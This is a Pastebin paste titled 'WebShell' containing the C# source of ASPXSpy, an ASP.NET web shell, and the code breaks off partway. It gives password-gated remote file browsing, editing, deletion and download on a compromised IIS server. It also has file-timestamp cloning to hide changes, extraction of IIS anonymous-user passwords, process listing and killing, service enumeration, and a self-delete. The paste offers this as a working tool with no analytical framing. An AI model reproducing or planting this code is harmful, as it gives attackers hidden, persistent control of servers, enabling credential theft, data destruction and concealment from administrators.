daily pastebin goal
5%
SHARE
TWEET

WebShell

DarkProgrammer000 Dec 1st, 2018 136 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
  2. <%@ import Namespace="System.IO"%>
  3. <%@ import Namespace="System.Diagnostics"%>
  4. <%@ import Namespace="System.Data"%>
  5. <%@ import Namespace="System.Management"%>
  6. <%@ import Namespace="System.Data.OleDb"%>
  7. <%@ import Namespace="Microsoft.Win32"%>
  8. <%@ import Namespace="System.Net.Sockets" %>
  9. <%@ import Namespace="System.Net" %>
  10. <%@ import Namespace="System.Runtime.InteropServices"%>
  11. <%@ import Namespace="System.DirectoryServices"%>
  12. <%@ import Namespace="System.ServiceProcess"%>
  13. <%@ import Namespace="System.Text.RegularExpressions"%>
  14. <%@ Import Namespace="System.Threading"%>
  15. <%@ Import Namespace="System.Data.SqlClient"%>
  16. <%@ import Namespace="Microsoft.VisualBasic"%>
  17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
  21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  22. <script runat="server">
  23. /*
  24. Thanks Snailsor,FuYu,BloodSword,Cnqing,
  25. Code by Bin
  26. Make in China
  27. Blog: http://www.rootkit.net.cn
  28. E-mail : master@rootkit.net.cn
  29. */
  30. public string Password="21232f297a57a5a743894a0e4a801fc3";//admin
  31. public string vbhLn="ASPXSpy";
  32. public int TdgGU=1;
  33. protected OleDbConnection Dtdr=new OleDbConnection();
  34. protected OleDbCommand Kkvb=new OleDbCommand();
  35. public NetworkStream NS=null;
  36. public NetworkStream NS1=null;
  37. TcpClient tcp=new TcpClient();
  38. TcpClient zvxm=new TcpClient();
  39. ArrayList IVc=new ArrayList();
  40. protected void Page_load(object sender,EventArgs e)
  41. {
  42. YFcNP(this);
  43. fhAEn();
  44. if (!pdo())
  45. {
  46. return;
  47. }
  48. if(IsPostBack)
  49. {
  50. string tkI=Request["__EVENTTARGET"];
  51. string VqV=Request["__File"];
  52. if(tkI!="")
  53. {
  54. switch(tkI)
  55. {
  56. case "Bin_Parent":
  57. krIR(Ebgw(VqV));
  58. break;
  59. case "Bin_Listdir":
  60. krIR(Ebgw(VqV));
  61. break;
  62. case "kRXgt":
  63. kRXgt(Ebgw(VqV));
  64. break;
  65. case "Bin_Createfile":
  66. gLKc(VqV);
  67. break;
  68. case "Bin_Editfile":
  69. gLKc(VqV);
  70. break;
  71. case "Bin_Createdir":
  72. stNPw(VqV);
  73. break;
  74. case "cYAl":
  75. cYAl(VqV);
  76. break;
  77. case "ksGR":
  78. ksGR(Ebgw(VqV));
  79. break;
  80. case "SJv":
  81. SJv(VqV);
  82. break;
  83. case "Bin_Regread":
  84. tpRQ(Ebgw(VqV));
  85. break;
  86. case "hae":
  87. hae();
  88. break;
  89. case "urJG":
  90. urJG(VqV);
  91. break;
  92. }
  93. if(tkI.StartsWith("dAJTD"))
  94. {
  95. dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
  96. }
  97. else if(tkI.StartsWith("Tlvz"))
  98. {
  99. Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
  100. }
  101. else if(tkI.StartsWith("Bin_CFile"))
  102. {
  103. YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
  104. }
  105. }
  106. }
  107. else
  108. {
  109. PBZw();
  110. }
  111. }
  112. public bool pdo()
  113. {
  114. if(Request.Cookies[vbhLn]==null)
  115. {
  116. tZSx();
  117. return false;
  118. }
  119. else
  120. {
  121. if (Request.Cookies[vbhLn].Value != Password)
  122. {
  123. tZSx();
  124. return false;
  125. }
  126. else
  127. {
  128. return true;
  129. }
  130. }
  131. }
  132. public void tZSx()
  133. {
  134. ljtzC.Visible=true;
  135. ZVS.Visible=false;
  136. }
  137. protected void YKpI(object sender,EventArgs e)
  138. {
  139. Session.Abandon();
  140. Response.Cookies.Add(new HttpCookie(vbhLn,null));
  141. tZSx();
  142. }
  143. public void PBZw()
  144. {
  145. ZVS.Visible=true;
  146. ljtzC.Visible=false;
  147. Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
  148. Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
  149. Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
  150. Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
  151. Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
  152. if (AXSbb.Value==string.Empty)
  153. {
  154. AXSbb.Value=OElM(Server.MapPath("."));
  155. }
  156. Bin_H2_Title.InnerText="File Manager >>";
  157. krIR(AXSbb.Value);
  158. }
  159. public void fhAEn()
  160. {
  161. try
  162. {
  163. string[] YRgt=Directory.GetLogicalDrives();
  164. for(int i=0;i<YRgt.Length;i++)
  165. {
  166. Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
  167. Bin_Span_Drv.Controls.Add(c);
  168. LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
  169. nxeDR.Command+=new CommandEventHandler(this.iVk);
  170. }
  171. }catch(Exception ex){}
  172. }
  173. public string OElM(string path)
  174. {
  175. if(path.Substring(path.Length-1,1)!=@"\")
  176. {
  177. path=path+@"\";
  178. }
  179. return path;
  180. }
  181. public string nrrx(string path)
  182. {
  183. char[] trim={'\\'};
  184. if(path.Substring(path.Length-1,1)==@"\")
  185. {
  186. path=path.TrimEnd(trim);
  187. }
  188. return path;
  189. }
  190. [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
  191. public static extern int OMZP(string nDrive);
  192. public string mFvj(string instr)
  193. {
  194. string EuXD=string.Empty;
  195. int num=OMZP(instr);
  196. switch(num)
  197. {
  198. case 1:
  199. EuXD="Unknow("+instr+")";
  200. break;
  201. case 2:
  202. EuXD="Removable("+instr+")";
  203. break;
  204. case 3:
  205. EuXD="Fixed("+instr+")";
  206. break;
  207. case 4:
  208. EuXD="Network("+instr+")";
  209. break;
  210. case 5:
  211. EuXD="CDRom("+instr+")";
  212. break;
  213. case 6:
  214. EuXD="RAM Disk("+instr+")";
  215. break;
  216. }
  217. return EuXD.Replace(@"\","");
  218. }
  219. public string MVVJ(string instr)
  220. {
  221. byte[] tmp=Encoding.Default.GetBytes(instr);
  222. return Convert.ToBase64String(tmp);
  223. }
  224. public string Ebgw(string instr)
  225. {
  226. byte[] tmp=Convert.FromBase64String(instr);
  227. return Encoding.Default.GetString(tmp);
  228. }
  229. public void krIR(string path)
  230. {
  231. WICxe();
  232. CzfO.Visible=true;
  233. Bin_H2_Title.InnerText="File Manager >>";
  234. AXSbb.Value=OElM(path);
  235. DirectoryInfo GQMM=new DirectoryInfo(path);
  236. if(Directory.GetParent(nrrx(path))!=null)
  237. {
  238. string bg=OKM();
  239. TableRow p=new TableRow();
  240. for(int i=1;i<6;i++)
  241. {
  242. TableCell pc=new TableCell();
  243. if(i==1)
  244. {
  245. pc.Width=Unit.Parse("2%");
  246. pc.Text="0";
  247. p.CssClass=bg;
  248. }
  249. if(i==2)
  250. {
  251. pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
  252. }
  253. p.Cells.Add(pc);
  254. UGzP.Rows.Add(p);
  255. }
  256. }
  257. try
  258. {
  259. int vLlH=0;
  260. foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
  261. {
  262. string bg=OKM();
  263. vLlH++;
  264. TableRow tr=new TableRow();
  265. TableCell tc=new TableCell();
  266. tc.Width=Unit.Parse("2%");
  267. tc.Text="0";
  268. tr.Attributes["onmouseover"]="this.className='focus';";
  269. tr.CssClass=bg;
  270. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  271. tr.Cells.Add(tc);
  272. TableCell HczyN=new TableCell();
  273. HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
  274. tr.Cells.Add(HczyN);
  275. TableCell LYZK=new TableCell();
  276. LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
  277. tr.Cells.Add(LYZK);
  278. UGzP.Rows.Add(tr);
  279. TableCell ERUL=new TableCell();
  280. ERUL.Text="--";
  281. tr.Cells.Add(ERUL);
  282. UGzP.Rows.Add(tr);
  283. TableCell ZGKh=new TableCell();
  284. ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
  285. tr.Cells.Add(ZGKh);
  286. UGzP.Rows.Add(tr);
  287. }
  288. TableRow cKVA=new TableRow();
  289. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
  290. cKVA.Attributes["bgcolor"]="#dddddd";
  291. TableCell JlmW=new TableCell();
  292. JlmW.Attributes["colspan"]="6" ;
  293. JlmW.Attributes["height"]="5";
  294. cKVA.Cells.Add(JlmW);
  295. UGzP.Rows.Add(cKVA);
  296. int aYRwo=0;
  297. foreach(FileInfo Bin_Files in GQMM.GetFiles())
  298. {
  299. aYRwo++;
  300. string gb=OKM();
  301. TableRow tr=new TableRow();
  302. TableCell tc=new TableCell();
  303. tc.Width=Unit.Parse("2%");
  304. tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
  305. tr.Attributes["onmouseover"]="this.className='focus';";
  306. tr.CssClass=gb;
  307. tr.Attributes["onmouseout"]="this.className='"+gb+"';";
  308. tr.Cells.Add(tc);
  309. TableCell filename=new TableCell();
  310. if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
  311. {
  312. string url=Request.Url.ToString();
  313. filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
  314. }
  315. else
  316. {
  317. filename.Text=Bin_Files.Name;
  318. }
  319. TableCell albt=new TableCell();
  320. albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
  321. TableCell YzK=new TableCell();
  322. YzK.Text=mTG(Bin_Files.Length);
  323. TableCell GLpi=new TableCell();
  324. GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
  325. tr.Cells.Add(filename);
  326. tr.Cells.Add(albt);
  327. tr.Cells.Add(YzK);
  328. tr.Cells.Add(GLpi);
  329. UGzP.Rows.Add(tr);
  330. }
  331. string lgb=OKM();
  332. TableRow oWam=new TableRow();
  333. oWam.CssClass=lgb;
  334. for(int i=1;i<4;i++)
  335. {
  336. TableCell lGV=new TableCell();
  337. if(i==1)
  338. {
  339. lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
  340. }
  341. if(i==2)
  342. {
  343. lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
  344. }
  345. if(i==3)
  346. {
  347. lGV.ColumnSpan=4;
  348. lGV.Style.Add("text-align","right");
  349. lGV.Text=vLlH+" directories/ "+aYRwo+" files";
  350. }
  351. oWam.Cells.Add(lGV);
  352. }
  353. UGzP.Rows.Add(oWam);
  354. }
  355. catch(Exception error)
  356. {
  357. xseuB(error.Message);
  358. }
  359. }
  360. public string OKM()
  361. {
  362. TdgGU++;
  363. if(TdgGU % 2==0)
  364. {
  365. return "alt1";
  366. }
  367. else
  368. {
  369. return "alt2";
  370. }
  371. }
  372. public void kRXgt(string qcKu)
  373. {
  374. try
  375. {
  376. Directory.Delete(qcKu,true);
  377. xseuB("Directory delete new success !");
  378. }
  379. catch(Exception error)
  380. {
  381. xseuB(error.Message);
  382. }
  383. krIR(Directory.GetParent(qcKu).ToString());
  384. }
  385. public void dAJTD(string sdir,string ddir)
  386. {
  387. try
  388. {
  389. Directory.Move(sdir,ddir);
  390. xseuB("Directory Renamed Success !");
  391. }
  392. catch(Exception error)
  393. {
  394. xseuB(error.Message);
  395. }
  396. krIR(AXSbb.Value);
  397. }
  398. public void Tlvz(string sfile,string dfile)
  399. {
  400. try
  401. {
  402. File.Move(sfile,dfile);
  403. xseuB("File Renamed Success !");
  404. }
  405. catch(Exception error)
  406. {
  407. xseuB(error.Message);
  408. }
  409. krIR(AXSbb.Value);
  410. }
  411. public void YByN(string spath,string dpath)
  412. {
  413. try
  414. {
  415. File.Copy(spath,dpath);
  416. xseuB("File Copy Success !");
  417. }
  418. catch(Exception error)
  419. {
  420. xseuB(error.Message);
  421. }
  422. krIR(AXSbb.Value);
  423. }
  424. public void stNPw(string path)
  425. {
  426. try
  427. {
  428. Directory.CreateDirectory(AXSbb.Value+path);
  429. xseuB("Directory created success !");
  430. }
  431. catch(Exception error)
  432. {
  433. xseuB(error.Message);
  434. }
  435. krIR(AXSbb.Value);
  436. }
  437. public void gLKc(string path)
  438. {
  439. if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
  440. {
  441. foreach(ListItem item in NdCX.Items)
  442. {
  443. if(item.Selected=true)
  444. {
  445. item.Selected=false;
  446. }
  447. }
  448. }
  449. Bin_H2_Title.InnerHtml="Create/ Edit File >>";
  450. WICxe();
  451. vrFA.Visible=true;
  452. if(path.IndexOf(":")< 0)
  453. {
  454. Sqon.Value=AXSbb.Value+path;
  455. }
  456. else
  457. {
  458. Sqon.Value=path;
  459. }
  460. if(File.Exists(Sqon.Value))
  461. {
  462. StreamReader sr;
  463. if(NdCX.SelectedItem.Text=="UTF-8")
  464. {
  465. sr=new StreamReader(Sqon.Value,Encoding.UTF8);
  466. }
  467. else
  468. {
  469. sr=new StreamReader(Sqon.Value,Encoding.Default);
  470. }
  471. Xgvv.InnerText=sr.ReadToEnd();
  472. sr.Close();
  473. }
  474. else
  475. {
  476. Xgvv.InnerText=string.Empty;
  477. }
  478. }
  479. public void ksGR(string path)
  480. {
  481. FileInfo fs=new FileInfo(path);
  482. Response.Clear();
  483. Page.Response.ClearHeaders();
  484. Page.Response.Buffer=false;
  485. this.EnableViewState=false;
  486. Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
  487. Response.AddHeader("Content-Length",fs.Length.ToString());
  488. Page.Response.ContentType="application/unknown";
  489. Response.WriteFile(fs.FullName);
  490. Page.Response.Flush();
  491. Page.Response.Close();
  492. Response.End();
  493. Page.Response.Clear();
  494. }
  495. public void SJv(string path)
  496. {
  497. try
  498. {
  499. string[] spdT=path.Split(',');
  500. for(int i=0;i<spdT.Length-1;i++)
  501. {
  502. File.Delete(AXSbb.Value+Ebgw(spdT[i]));
  503. }
  504. xseuB("File Delete Success !");
  505. }
  506. catch(Exception error)
  507. {
  508. xseuB(error.Message);
  509. }
  510. krIR(AXSbb.Value);
  511. }
  512. public void hae()
  513. {
  514. try
  515. {
  516. File.Delete(Request.PhysicalPath);
  517. Response.Redirect("http://www.rootkit.net.cn");
  518. }
  519. catch(Exception error)
  520. {
  521. xseuB(error.Message);
  522. }
  523. }
  524. public void cYAl(string path)
  525. {
  526. Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
  527. WICxe();
  528. zRyG.Visible=true;
  529. QiFB.Value=AXSbb.Value+path;
  530. lICp.Value=AXSbb.Value;
  531. pWVL.Value=AXSbb.Value+path;
  532. string Att=File.GetAttributes(QiFB.Value).ToString();
  533. if(Att.LastIndexOf("ReadOnly")!=-1)
  534. {
  535. ZhWSK.Checked=true;
  536. }
  537. if(Att.LastIndexOf("System")!=-1)
  538. {
  539. SsR.Checked=true;
  540. }
  541. if(Att.LastIndexOf("Hidden")!=-1)
  542. {
  543. ccB.Checked=true;
  544. }
  545. if(Att.LastIndexOf("Archive")!=-1)
  546. {
  547. fbyZ.Checked=true;
  548. }
  549. yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
  550. uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
  551. aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
  552. }
  553. public static String mTG(Int64 fileSize)
  554. {
  555. if(fileSize<0)
  556. {
  557. throw new ArgumentOutOfRangeException("fileSize");
  558. }
  559. else if(fileSize >= 1024 * 1024 * 1024)
  560. {
  561. return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
  562. }
  563. else if(fileSize >= 1024 * 1024)
  564. {
  565. return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
  566. }
  567. else if(fileSize >= 1024)
  568. {
  569. return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
  570. }
  571. else
  572. {
  573. return string.Format("{0} B",fileSize);
  574. }
  575. }
  576. private bool SGde(string sSrc)
  577. {
  578. Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
  579. if(reg.IsMatch(sSrc))
  580. {
  581. return true;
  582. }
  583. else
  584. {
  585. return false;
  586. }
  587. }
  588. public void AdCx()
  589. {
  590. string qcKu=string.Empty;
  591. string mWGEm="IIS://localhost/W3SVC";
  592. GlI.Style.Add("word-break","break-all");
  593. try
  594. {
  595. DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
  596. int fmW=0;
  597. foreach(DirectoryEntry child in HHzcY.Children)
  598. {
  599. if(SGde(child.Name.ToString()))
  600. {
  601. fmW++;
  602. DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
  603. DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
  604. string bg=OKM();
  605. TableRow TR=new TableRow();
  606. TR.Attributes["onmouseover"]="this.className='focus';";
  607. TR.CssClass=bg;
  608. TR.Attributes["onmouseout"]="this.className='"+bg+"';";
  609. TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
  610. for(int i=1;i<6;i++)
  611. {
  612. try
  613. {
  614. TableCell tfit=new TableCell();
  615. switch(i)
  616. {case 1:
  617. tfit.Text=fmW.ToString();
  618. break;
  619. case 2:
  620. tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
  621. break;
  622. case 3:
  623. tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
  624. break;
  625. case 4:
  626. StringBuilder sb=new StringBuilder();
  627. PropertyValueCollection pc=child.Properties["ServerBindings"];
  628. for (int j=0; j < pc.Count; j++)
  629. {
  630. sb.Append(pc[j].ToString()+"<br>");
  631. }
  632. tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
  633. break;
  634. case 5:
  635. tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
  636. break;
  637. }
  638. TR.Cells.Add(tfit);
  639. }
  640. catch (Exception ex)
  641. {
  642. xseuB(ex.Message);
  643. continue;
  644. }
  645. }
  646. GlI.Controls.Add(TR);
  647. }
  648. }
  649. }
  650. catch(Exception ex)
  651. {
  652. xseuB(ex.Message);
  653. }
  654. }
  655. public ManagementObjectCollection PhQTd(string query)
  656. {
  657. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
  658. return QS.Get();
  659. }
  660. public DataTable cCf(string query)
  661. {
  662. DataTable dt=new DataTable();
  663. int i=0;
  664. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
  665. try
  666. {
  667. foreach(ManagementObject m in QS.Get())
  668. {
  669. DataRow dr=dt.NewRow();
  670. PropertyDataCollection.PropertyDataEnumerator oEnum;
  671. oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
  672. while(oEnum.MoveNext())
  673. {
  674. PropertyData DRU=(PropertyData)oEnum.Current;
  675. if(dt.Columns.IndexOf(DRU.Name)==-1)
  676. {
  677. dt.Columns.Add(DRU.Name);
  678. dt.Columns[dt.Columns.Count-1].DefaultValue="";
  679. }
  680. if(m[DRU.Name]!=null)
  681. {
  682. dr[DRU.Name]=m[DRU.Name].ToString();
  683. }
  684. else
  685. {
  686. dr[DRU.Name]=string.Empty;
  687. }
  688. }
  689. dt.Rows.Add(dr);
  690. }
  691. }
  692. catch(Exception error)
  693. {
  694. }
  695. return dt;
  696. }
  697. public void YUw()
  698. {
  699. try
  700. {
  701. Bin_H2_Title.InnerText="Process >>";
  702. WICxe();
  703. DCbS.Visible=true;
  704. int UEbTI=0;
  705. Process[] p=Process.GetProcesses();
  706. foreach(Process sp in p)
  707. {
  708. UEbTI++;
  709. string bg=OKM();
  710. TableRow tr=new TableRow();
  711. tr.Attributes["onmouseover"]="this.className='focus';";
  712. tr.CssClass=bg;
  713. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  714. for(int i=1;i<7;i++)
  715. {
  716. TableCell td=new TableCell();
  717. if(i==1)
  718. {
  719. td.Width=Unit.Parse("2%");
  720. td.Text=UEbTI.ToString();
  721. tr.Controls.Add(td);
  722. }
  723. if(i==2)
  724. {
  725. td.Text=sp.Id.ToString();
  726. tr.Controls.Add(td);
  727. }
  728. if(i==3)
  729. {
  730. td.Text=sp.ProcessName.ToString();
  731. tr.Controls.Add(td);
  732. }
  733. if(i==4)
  734. {
  735. td.Text=sp.Threads.Count.ToString();
  736. tr.Controls.Add(td);
  737. }
  738. if(i==5)
  739. {
  740. td.Text=sp.BasePriority.ToString();
  741. tr.Controls.Add(td);
  742. }
  743. if(i==6)
  744. {
  745. td.Text="--";
  746. tr.Controls.Add(td);
  747. }
  748. }
  749. IjsL.Controls.Add(tr);
  750. }
  751. }
  752. catch(Exception error)
  753. {
  754. AIz();
  755. }
  756. AIz();
  757. }
  758. public void AIz()
  759. {
  760. try
  761. {
  762. Bin_H2_Title.InnerText="Process >>";
  763. WICxe();
  764. DCbS.Visible=true;
  765. int UEbTI=0;
  766. DataTable dt=cCf("Win32_Process");
  767. for(int j=0;j<dt.Rows.Count;j++)
  768. {
  769. UEbTI++;
  770. string bg=OKM();
  771. TableRow tr=new TableRow();
  772. tr.Attributes["onmouseover"]="this.className='focus';";
  773. tr.CssClass=bg;
  774. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  775. for(int i=1;i<7;i++)
  776. {
  777. TableCell td=new TableCell();
  778. if(i==1)
  779. {
  780. td.Width=Unit.Parse("2%");
  781. td.Text=UEbTI.ToString();
  782. tr.Controls.Add(td);
  783. }
  784. if(i==2)
  785. {
  786. td.Text=dt.Rows[j]["ProcessID"].ToString();
  787. tr.Controls.Add(td);
  788. }
  789. if(i==3)
  790. {
  791. td.Text=dt.Rows[j]["Name"].ToString();
  792. tr.Controls.Add(td);
  793. }
  794. if(i==4)
  795. {
  796. td.Text=dt.Rows[j]["ThreadCount"].ToString();
  797. tr.Controls.Add(td);
  798. }
  799. if(i==5)
  800. {
  801. td.Text=dt.Rows[j]["Priority"].ToString();
  802. tr.Controls.Add(td);
  803. }
  804. if(i==6)
  805. {
  806. if( dt.Rows[j]["CommandLine"]!=string.Empty)
  807. {
  808. td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
  809. }
  810. else
  811. {
  812. td.Text="--";
  813. }
  814. tr.Controls.Add(td);
  815. }
  816. }
  817. IjsL.Controls.Add(tr);
  818. }
  819. }
  820. catch(Exception error)
  821. {
  822. xseuB(error.Message);
  823. }
  824. }
  825. public void urJG(string pid)
  826. {
  827. try
  828. {
  829. foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
  830. {
  831. p.InvokeMethod("Terminate",null);
  832. p.Dispose();
  833. }
  834. xseuB("Process Kill Success !");
  835. }
  836. catch(Exception error)
  837. {
  838. xseuB(error.Message);
  839. }
  840. AIz();
  841. }
  842. public void oHpF()
  843. {
  844. try
  845. {
  846. Bin_H2_Title.InnerText="Services >>";
  847. WICxe();
  848. iQxm.Visible=true;
  849. int UEbTI=0;
  850. ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
  851. for(int i=0;i<kQmRu.Length;i++)
  852. {
  853. UEbTI++;
  854. string bg=OKM();
  855. TableRow tr=new TableRow();
  856. tr.Attributes["onmouseover"]="this.className='focus';";
  857. tr.CssClass=bg;
  858. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  859. for(int b=1;b<7;b++)
  860. {
  861. TableCell td=new TableCell();
  862. if(b==1)
  863. {
  864. td.Width=Unit.Parse("2%");
  865. td.Text=UEbTI.ToString();
  866. tr.Controls.Add(td);
  867. }
  868. if(b==2)
  869. {
  870. td.Text="null";
  871. tr.Controls.Add(td);
  872. }
  873. if(b==3)
  874. {
  875. td.Text=kQmRu[i].ServiceName.ToString();
  876. tr.Controls.Add(td);
  877. }
  878. if(b==4)
  879. {
  880. td.Text="";
  881. tr.Controls.Add(td);
  882. }
  883. if(b==5)
  884. {
  885. string kOIo=kQmRu[i].Status.ToString();
  886. if(kOIo=="Running")
  887. {
  888. td.Text="<font color=green>"+kOIo+"</font>";
  889. }
  890. else
  891. {
  892. td.Text="<font color=red>"+kOIo+"</font>";
  893. }
  894. tr.Controls.Add(td);
  895. }
  896. if(b==6)
  897. {
  898. td.Text="";
  899. tr.Controls.Add(td);
  900. }
  901. }
  902. vHCs.Controls.Add(tr);
  903. }
  904. }
  905. catch(Exception error)
  906. {
  907. xseuB(error.Message);
  908. }
  909. }
  910. public void tZRH()
  911. {
  912. try
  913. {
  914. Bin_H2_Title.InnerText="Services >>";
  915. WICxe();
  916. iQxm.Visible=true;
  917. int UEbTI=0;
  918. DataTable dt=cCf("Win32_Service");
  919. for(int j=0;j<dt.Rows.Count;j++)
  920. {
  921. UEbTI++;
  922. string bg=OKM();
  923. TableRow tr=new TableRow();
  924. tr.Attributes["onmouseover"]="this.className='focus';";
  925. tr.CssClass=bg;
  926. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  927. tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
  928. for(int i=1;i<7;i++)
  929. {
  930. TableCell td=new TableCell();
  931. if(i==1)
  932. {
  933. td.Width=Unit.Parse("2%");
  934. td.Text=UEbTI.ToString();
  935. tr.Controls.Add(td);
  936. }
  937. if(i==2)
  938. {
  939. td.Text=dt.Rows[j]["ProcessID"].ToString();
  940. tr.Controls.Add(td);
  941. }
  942. if(i==3)
  943. {
  944. td.Text=dt.Rows[j]["Name"].ToString();
  945. tr.Controls.Add(td);
  946. }
  947. if(i==4)
  948. {
  949. td.Text=dt.Rows[j]["PathName"].ToString();
  950. tr.Controls.Add(td);
  951. }
  952. if(i==5)
  953. {
  954. string kOIo=dt.Rows[j]["State"].ToString();
  955. if(kOIo=="Running")
  956. {
  957. td.Text="<font color=green>"+kOIo+"</font>";
  958. }
  959. else
  960. {
  961. td.Text="<font color=red>"+kOIo+"</font>";
  962. }
  963. tr.Controls.Add(td);
  964. }
